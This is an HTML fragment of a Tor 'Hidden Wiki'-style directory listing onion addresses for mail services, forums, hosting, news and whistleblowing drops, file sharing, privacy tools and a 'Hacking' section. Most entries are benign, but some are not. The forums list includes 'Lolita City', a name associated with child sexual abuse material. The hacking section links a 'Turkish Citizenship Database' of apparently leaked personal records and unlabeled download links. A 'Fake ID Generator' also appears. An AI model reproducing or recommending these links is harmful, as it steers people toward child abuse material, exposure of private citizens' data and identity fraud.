<li><a href="http://j3bv7g27oramhbxxuv6gl3dcyfmf44qnvju3offdyrap7hurfprq74qd.onion/" target="_blank" rel="noopener">http://j3bv7g27oramhbxxuv6gl3dcyfmf44qnvju3offdyrap7hurfprq74qd.onion/</a> &#8211; adunanza OnionMail Server</li>
<li><a href="http://cwu7eglxcabwttzf.onion/" target="_blank" rel="noopener">http://cwu7eglxcabwttzf.onion/</a> &#8211; Confidant Mail</li>
<li><a href="http://cockmailwwfvrtqj.onion/" target="_blank" rel="noopener">http://cockmailwwfvrtqj.onion/</a> &#8211; Cockmail</li>
<li><a href="http://mail2torjgmxgexntbrmhvgluavhj7ouul5yar6ylbvjkxwqf6ixkwyd.onion/" target="_blank" rel="noopener">http://mail2torjgmxgexntbrmhvgluavhj7ouul5yar6ylbvjkxwqf6ixkwyd.onion/</a> &#8211; Mail2Tor</li>
<li><a href="http://underwood2hj3pwd.onion/" target="_blank" rel="noopener">http://underwood2hj3pwd.onion/</a> &#8211; Underwood&#8217;s Mail</li>
</ul>
<p>&nbsp;</p>
<h2>Forums / Social</h2>
<ul>
<li><a href="http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/" target="_blank" rel="noopener">http://dreadytofatroptsdj6io7l3xptbet6onoyno2yv7jicoxknyazubrad.onion/</a> &#8211; dread</li>
<li><a href="http://germany2igel45jbmjdipfbzdswjcpjqzqozxt4l33452kzrrda2rbid.onion/" target="_blank" rel="noopener">http://germany2igel45jbmjdipfbzdswjcpjqzqozxt4l33452kzrrda2rbid.onion/</a> &#8211; Deutschland im Deep Web Forum</li>
<li><a href="http://answerszuvs3gg2l64e6hmnryudl5zgrmwm3vh65hzszdghblddvfiqd.onion/" target="_blank" rel="noopener">http://answerszuvs3gg2l64e6hmnryudl5zgrmwm3vh65hzszdghblddvfiqd.onion/</a> &#8211; Hidden Answers</li>
<li><a href="http://rhe4faeuhjs4ldc5.onion/" target="_blank" rel="noopener">http://rhe4faeuhjs4ldc5.onion/</a> &#8211; AN0NYM0US&#8217;z F0RUM</li>
<li><a href="http://suprbaydvdcaynfo4dgdzgxb4zuso7rftlil5yg5kqjefnw4wq4ulcad.onion/" target="_blank" rel="noopener">http://suprbaydvdcaynfo4dgdzgxb4zuso7rftlil5yg5kqjefnw4wq4ulcad.onion/</a> &#8211; SuprBay: The PirateBay Forum</li>
<li><a href="http://rutordeepkpafpudl22pbbhzm4llbgncunvgcc66kax55sc4mp4kxcid.onion/" target="_blank" rel="noopener">http://rutordeepkpafpudl22pbbhzm4llbgncunvgcc66kax55sc4mp4kxcid.onion/</a> &#8211; Rutor</li>
<li><a href="http://mnwverhclu56p2zofu7iotkh2quucwev2f47hh5g5xdtme7ddne2jzqd.onion/" target="_blank" rel="noopener">http://mnwverhclu56p2zofu7iotkh2quucwev2f47hh5g5xdtme7ddne2jzqd.onion/</a> &#8211; Lolita City</li>
<li><a href="http://enxx3byspwsdo446jujc52ucy2pf5urdbhqw3kbsfhlfjwmbpj5smdad.onion/" target="_blank" rel="noopener">http://enxx3byspwsdo446jujc52ucy2pf5urdbhqw3kbsfhlfjwmbpj5smdad.onion/</a> &#8211; Endchan</li>
<li><a href="http://c32zjeghcp5tj3kb72pltz56piei66drc63vkhn5yixiyk4cmerrjtid.onion/" target="_blank" rel="noopener">http://c32zjeghcp5tj3kb72pltz56piei66drc63vkhn5yixiyk4cmerrjtid.onion/</a> &#8211; Raddle</li>
<li><a href="http://wbi67emmdx6i6rcr6nnk3hco3nrvdc2juxrbvomvt6nze5afjz6pgtad.onion/" target="_blank" rel="noopener">http://wbi67emmdx6i6rcr6nnk3hco3nrvdc2juxrbvomvt6nze5afjz6pgtad.onion/</a> &#8211; MadIRC</li>
<li><a href="http://thestock6nonb74owd6utzh4vld3xsf2n2fwxpwywjgq7maj47mvwmid.onion/" target="_blank" rel="noopener">http://thestock6nonb74owd6utzh4vld3xsf2n2fwxpwywjgq7maj47mvwmid.onion/</a> &#8211; The Stock Insiders</li>
<li><a href="http://facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion/" target="_blank" rel="noopener">http://facebookwkhpilnemxj7asaniu7vnjjbiltxjqhye3mhbshg7kx5tfyd.onion/</a> &#8211; Facebook</li>
<li><a href="http://notbumpz34bgbz4yfdigxvd6vzwtxc3zpt5imukgl6bvip2nikdmdaad.onion/" target="_blank" rel="noopener">http://notbumpz34bgbz4yfdigxvd6vzwtxc3zpt5imukgl6bvip2nikdmdaad.onion/</a> &#8211; Ableonion</li>
<li><a href="http://ijeeynrc6x2uy5ob.onion/" target="_blank" rel="noopener">http://ijeeynrc6x2uy5ob.onion/</a> &#8211; The Calyx Institute (Jabber)</li>
</ul>
<p>&nbsp;</p>
<h2>Onion Hosting / Domain Services</h2>
<ul>
<li><a href="http://mgibojrlzdfoajbn.onion/" target="_blank" rel="noopener">http://mgibojrlzdfoajbn.onion/</a> &#8211; TorShops</li>
<li><a href="http://fhostingineiwjg6cppciac2bemu42nwsupvvisihnczinok362qfrqd.onion/" target="_blank" rel="noopener">http://fhostingineiwjg6cppciac2bemu42nwsupvvisihnczinok362qfrqd.onion/</a> &#8211; Freedom Hosting Reloaded</li>
<li><a href="http://spore64i5sofqlfz5gq2ju4msgzojjwifls7rok2cti624zyq3fcelad.onion/" target="_blank" rel="noopener">http://spore64i5sofqlfz5gq2ju4msgzojjwifls7rok2cti624zyq3fcelad.onion/</a> &#8211; SporeStack</li>
<li><a href="http://hzwjmjimhr7bdmfv2doll4upibt5ojjmpo3pbp5ctwcg37n3hyk7qzid.onion/" target="_blank" rel="noopener">http://hzwjmjimhr7bdmfv2doll4upibt5ojjmpo3pbp5ctwcg37n3hyk7qzid.onion/</a> &#8211; Ablative Hosting</li>
<li><a href="http://kowloon5aibdbege.onion/" target="_blank" rel="noopener">http://kowloon5aibdbege.onion/</a> &#8211; Kowloon Hosting</li>
<li><a href="http://torpress2sarn7xw.onion/" target="_blank" rel="noopener">http://torpress2sarn7xw.onion/</a> &#8211; TorPress, Free wordpress hosting</li>
<li><a href="http://kaizushigdv5mrnz.onion/" target="_blank" rel="noopener">http://kaizushigdv5mrnz.onion/</a> &#8211; Kaizushi PHP, Django and Rails hosting and VPS</li>
<li><a href="http://onionname3jpufot.onion/" target="_blank" rel="noopener">http://onionname3jpufot.onion/</a> &#8211; OnionName</li>
<li><a href="http://garlic7ravilyupx.onion/" target="_blank" rel="noopener">http://garlic7ravilyupx.onion/</a> &#8211; Garlic &#8211; Onion Generator</li>
</ul>
<p>&nbsp;</p>
<h2>Whistleblowing / News</h2>
<ul>
<li><a href="http://p53lf57qovyuvwsc6xnrppyply3vtqm7l6pcobkmyqsiofyeznfu5uqd.onion/" target="_blank" rel="noopener">http://p53lf57qovyuvwsc6xnrppyply3vtqm7l6pcobkmyqsiofyeznfu5uqd.onion/</a> &#8211; ProPublica</li>
<li><a href="http://occrpweb4n2vlmih.onion/" target="_blank" rel="noopener">http://occrpweb4n2vlmih.onion/</a> &#8211; Organized Crime and Corruption Reporting Project</li>
<li><a href="http://nytimes3xbfgragh.onion/" target="_blank" rel="noopener">http://nytimes3xbfgragh.onion/</a> &#8211; The New York Times</li>
<li><a href="http://jokerbuzzhyhl5cl.onion/" target="_blank" rel="noopener">http://jokerbuzzhyhl5cl.onion/</a> &#8211; Joker.buzz</li>
<li><a href="http://privacyintyqcroe.onion/" target="_blank" rel="noopener">http://privacyintyqcroe.onion/</a> &#8211; Privacy International</li>
<li><a href="http://xp44cagis447k3lpb4wwhcqukix6cgqokbuys24vmxmbzmaq2gjvc2yd.onion/" target="_blank" rel="noopener">http://xp44cagis447k3lpb4wwhcqukix6cgqokbuys24vmxmbzmaq2gjvc2yd.onion/</a> &#8211; The Guardian | SecureDrop</li>
<li><a href="http://3qf4wewa5bojmcgr.onion/" target="_blank" rel="noopener">http://3qf4wewa5bojmcgr.onion/</a> &#8211; BalkanLeaks</li>
<li><a href="http://bfnews3u2ox4m4ty.onion/" target="_blank" rel="noopener">http://bfnews3u2ox4m4ty.onion/</a> &#8211; BuzzFeed News</li>
<li><a href="http://f3mryj3e2uw2zrv3zv6up6maqosgzn27frz7xodvpl7pkestoyigtkad.onion/" target="_blank" rel="noopener">http://f3mryj3e2uw2zrv3zv6up6maqosgzn27frz7xodvpl7pkestoyigtkad.onion/</a> &#8211; AfriLEAKS</li>
<li><a href="http://dwnewsvdyyiamwnp.onion/" target="_blank" rel="noopener">http://dwnewsvdyyiamwnp.onion/</a> &#8211; DW</li>
<li><a href="http://27m3p2uv7igmj6kvd4ql3cct5h3sdwrsajovkkndeufumzyfhlfev4qd.onion/" target="_blank" rel="noopener">http://27m3p2uv7igmj6kvd4ql3cct5h3sdwrsajovkkndeufumzyfhlfev4qd.onion/</a> &#8211; The Intercept</li>
</ul>
<p>&nbsp;</p>
<h2>File Sharing</h2>
<ul>
<li><a href="http://bcloudwenjxgcxjh6uheyt72a5isimzgg4kv5u74jb2s22y3hzpwh6id.onion/" target="_blank" rel="noopener">http://bcloudwenjxgcxjh6uheyt72a5isimzgg4kv5u74jb2s22y3hzpwh6id.onion/</a> &#8211; BlackCloud</li>
<li><a href="http://zerobinftagjpeeebbvyzjcqyjpmjvynj5qlexwyxe7l3vqejxnqv5qd.onion/" target="_blank" rel="noopener">http://zerobinftagjpeeebbvyzjcqyjpmjvynj5qlexwyxe7l3vqejxnqv5qd.onion/</a> &#8211; ZeroBin</li>
<li><a href="http://keybase5wmilwokqirssclfnsqrjdsi7jdir5wy7y7iu3tanwmtp6oid.onion/" target="_blank" rel="noopener">http://keybase5wmilwokqirssclfnsqrjdsi7jdir5wy7y7iu3tanwmtp6oid.onion/</a> &#8211; Keybase</li>
<li><a href="http://secrdrop5wyphb5x.onion/" target="_blank" rel="noopener">http://secrdrop5wyphb5x.onion/</a> &#8211; SecureDrop</li>
</ul>
<p>&nbsp;</p>
<h2>Hacking</h2>
<ul>
<li><a href="https://rap0at.github.io/rap0at/index.html" target="_blank" rel="noopener">New</a> &#8211; New</li>
<li><a href="https://rap0at.github.io/SOURCE/index_maian.html" target="_blank" rel="noopener">Old</a> &#8211; Old</li>
<li><a href="https://terabox.com/s/1R77WQs87xVocsWmEXiKRXw" target="_blank" rel="noopener">ASAP</a> &#8211; ASAP</li>
<li><a href="https://terabox.com/s/1ifx-3_ik83kepgqEAX8M1w" target="_blank" rel="noopener">Backup</a> &#8211; Backup</li> 
<li><a href="http://torc5bhzq6xorhb4.onion/" target="_blank" rel="noopener">http://torc5bhzq6xorhb4.onion/</a> &#8211; Turkish Citizenship Database</li>
<li><a href="http://relateoak2hkvdty6ldp7x67hys7pzaeax3hwhidbqkjzva3223jpxqd.onion/" target="_blank" rel="noopener">http://relateoak2hkvdty6ldp7x67hys7pzaeax3hwhidbqkjzva3223jpxqd.onion/</a> &#8211; RelateList</li>
<li><a href="http://blackhost7pws76u6vohksdahnm6adf7riukgcmahrwt43wv2drvyxid.onion/" target="_blank" rel="noopener">http://blackhost7pws76u6vohksdahnm6adf7riukgcmahrwt43wv2drvyxid.onion/</a> &#8211; Hacker Game</li>
</ul>
<p>&nbsp;</p>
<h2>Others</h2>
<ul>
<li><a href="http://expyuzz4wqqyqhjn.onion/" target="_blank" rel="noopener">http://expyuzz4wqqyqhjn.onion/</a> &#8211; Tor Project</li>
<li><a href="http://nzh3fv6jc6jskki3.onion/" target="_blank" rel="noopener">http://nzh3fv6jc6jskki3.onion/</a> &#8211; riseup</li>
<li><a href="http://sejnfjrq6szgca7v.onion/" target="_blank" rel="noopener">http://sejnfjrq6szgca7v.onion/</a> &#8211; Debain OS</li>
<li><a href="http://lpiyu33yusoalp5kh3f4hak2so2sjjvjw5ykyvu2dulzosgvuffq6sad.onion/" target="_blank" rel="noopener">http://lpiyu33yusoalp5kh3f4hak2so2sjjvjw5ykyvu2dulzosgvuffq6sad.onion/</a> &#8211; Tech Learning Collective</li>
<li><a href="http://pornhubthbh7ap3u.onion/" target="_blank" rel="noopener">http://pornhubthbh7ap3u.onion/</a> &#8211; PornHub</li>
<li><a href="http://stormwayszuh4juycoy4kwoww5gvcu2c4tdtpkup667pdwe4qenzwayd.onion/" target="_blank" rel="noopener">http://stormwayszuh4juycoy4kwoww5gvcu2c4tdtpkup667pdwe4qenzwayd.onion/</a> &#8211; cryptostorm</li>
<li><a href="http://xmrguide42y34onq.onion/" target="_blank" rel="noopener">http://xmrguide42y34onq.onion/</a> &#8211; xmrguide</li>
<li><a href="http://nehdddktmhvqklsnkjqcbpmb63htee2iznpcbs5tgzctipxykpj6yrid.onion/" target="_blank" rel="noopener">http://nehdddktmhvqklsnkjqcbpmb63htee2iznpcbs5tgzctipxykpj6yrid.onion/</a> &#8211; LocalMonero</li>
<li><a href="http://xcln5hkbriyklr6n.onion/" target="_blank" rel="noopener">http://xcln5hkbriyklr6n.onion/</a> &#8211; Mullvad VPN</li>
<li><a href="http://njallalafimoej5i4eg7vlnqjvmb6zhdh27qxcatdn647jtwwwui3nad.onion/" target="_blank" rel="noopener">http://njallalafimoej5i4eg7vlnqjvmb6zhdh27qxcatdn647jtwwwui3nad.onion/</a> &#8211; Njalla</li>
<li><a href="http://sblib3fk2gryb46d.onion/" target="_blank" rel="noopener">http://sblib3fk2gryb46d.onion/</a> &#8211; Russian Books</li>
<li><a href="http://dsenxis5txr4zbxe.onion/" target="_blank" rel="noopener">http://dsenxis5txr4zbxe.onion/</a> &#8211; Russian Torrent / Forum</li>
<li><a href="http://sntfgwfami5fdbn5.onion/" target="_blank" rel="noopener">http://sntfgwfami5fdbn5.onion/</a> &#8211; Sonic &amp; Tails</li>
<li><a href="http://5p6dpc344vsbigv7.onion/" target="_blank" rel="noopener">http://5p6dpc344vsbigv7.onion/</a> &#8211; phdcasino</li>
<li><a href="http://archivecaslytosk.onion/" target="_blank" rel="noopener">http://archivecaslytosk.onion/</a> &#8211; Webpage archive</li>
<li><a href="http://vvedndyt433kopnhv6vejxnut54y5752vpxshjaqmj7ftwiu6quiv2ad.onion/" target="_blank" rel="noopener">http://vvedndyt433kopnhv6vejxnut54y5752vpxshjaqmj7ftwiu6quiv2ad.onion/</a> &#8211; PsychonauticsWIKI</li>
<li><a href="http://2jopbxfi2mrw6pfpmufm7smacrgniglr7a4raaila3kwlhlumflxfxad.onion/" target="_blank" rel="noopener">http://2jopbxfi2mrw6pfpmufm7smacrgniglr7a4raaila3kwlhlumflxfxad.onion/</a> &#8211; AgoraDesk</li>
<li><a href="http://jirk5u4osbsr34t5.onion/" target="_blank" rel="noopener">http://jirk5u4osbsr34t5.onion/</a> &#8211; OpenPGP Keyserver</li>
<li><a href="http://coinpaymtstgtibr.onion/" target="_blank" rel="noopener">http://coinpaymtstgtibr.onion/</a> &#8211; coinpayments</li>
<li><a href="http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion/" target="_blank" rel="noopener">http://ciadotgov4sjwlzihbbgxnqg3xiyrg7so2r2o3lt5wz5ypk4sxyjstad.onion/</a> &#8211; The CIA</li>
<li><a href="http://ncidetfs7banpz2d7vpndev5somwoki5vwdpfty2k7javniujekit6ad.onion/" target="_blank" rel="noopener">http://ncidetfs7banpz2d7vpndev5somwoki5vwdpfty2k7javniujekit6ad.onion/</a> &#8211; NCIDE Task Force</li>
<li><a href="http://tcecdnp2fhyxlcrjoyc2eimdjosr65hweut6y7r2u6b5y75yuvbkvfyd.onion/" target="_blank" rel="noopener">http://tcecdnp2fhyxlcrjoyc2eimdjosr65hweut6y7r2u6b5y75yuvbkvfyd.onion/</a> &#8211; National Police of the Netherlands</li>
<li><a href="http://elfqv3zjfegus3bgg5d7pv62eqght4h6sl6yjjhe7kjpi2s56bzgk2yd.onion/" target="_blank" rel="noopener">http://elfqv3zjfegus3bgg5d7pv62eqght4h6sl6yjjhe7kjpi2s56bzgk2yd.onion/</a> &#8211; Fake ID Generator</li>
<li><a href="http://elfqv3zjfegus3bgg5d7pv62eqght4h6sl6yjjhe7kjpi2s56bzgk2yd.onion/binfo_check_anonymity.php/" target="_blank" rel="noopener">http://elfqv3zjfegus3bgg5d7pv62eqght4h6sl6yjjhe7kjpi2s56bzgk2yd.onion/binfo_check_anonymity.php</a> &#8211; Check your anonymity online</li>
<li><a href="http://rougmnvswfsmd4dq.onion/" target="_blank" rel="noopener">http://rougmnvswfsmd4dq.onion/</a> &#8211; Tor Metrics</li>
<li><a href="http://deepdot35wvmeyd5.onion/" target="_blank" rel="noopener">http://deepdot35wvmeyd5.onion/</a> &#8211; DEEPDOTWEB</li>
<li><a href="http://superkuhbitj6tul.onion/" target="_blank" rel="noopener">http://superkuhbitj6tul.onion/</a> &#8211; superkuh</li>
<li><a href="http://bvten5svsltfpxrxl72ukqxixwo2m5ek5svmcxgrmkta4tbmiemuibid.onion/" target="_blank" rel="noopener">http://bvten5svsltfpxrxl72ukqxixwo2m5ek5svmcxgrmkta4tbmiemuibid.onion/</a> &#8211; Beneath VT</li>
<li><a href="http://potatoynwcg34xyodol6p6hvi5e4xelxdeowsl5t2daxywepub32y7yd.onion/" target="_blank" rel="noopener">http://potatoynwcg34xyodol6p6hvi5e4xelxdeowsl5t2daxywepub32y7yd.onion/</a> &#8211; Go Beyond</li>
<li><a href="http://connectkjsazkwud.onion/" target="_blank" rel="noopener">http://connectkjsazkwud.onion/</a> &#8211; Connect</li>
<li><a href="http://3kyl4i7bfdgwelmf.onion/" target="_blank" rel="noopener">http://3kyl4i7bfdgwelmf.onion/</a> &#8211; We Fight Censorship</li>
<li><a href="http://anonyradixhkgh5myfrkarggfnmdzzhhcgoy2v66uf7sml27to5n2tid.onion/" target="_blank" rel="noopener">http://anonyradixhkgh5myfrkarggfnmdzzhhcgoy2v66uf7sml27to5n2tid.onion/</a> &#8211; Deep Web Radio</li>
<li><a href="http://62gs2n5ydnyffzfy.onion/" target="_blank" rel="noopener">http://62gs2n5ydnyffzfy.onion/</a> &#8211; IIT Underground</li>
<li><a href="http://clockwise3rldkgu.onion/" target="_blank" rel="noopener">http://clockwise3rldkgu.onion/</a> &#8211; Clockwise Library</li>
</ul>
<h3><b>The Hidden Wiki<b></h3>
<p>link from Hidden WiKi</p>

<script type='text/javascript' src='https://thehidden.wiki/wp-content/themes/micro/assets/scripts/bundle.min.js?ver=20200207' id='micro-navigation-js'></script>
<script src='https://stats.wp.com/e-202213.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:9.8.1',blog:'194491690',post:'2',tz:'5.5',srv:'thehidden.wiki'} ]);
	_stq.push([ 'clickTrackerInit', '194491690', '2' ]);
</script>

</body>
</html>
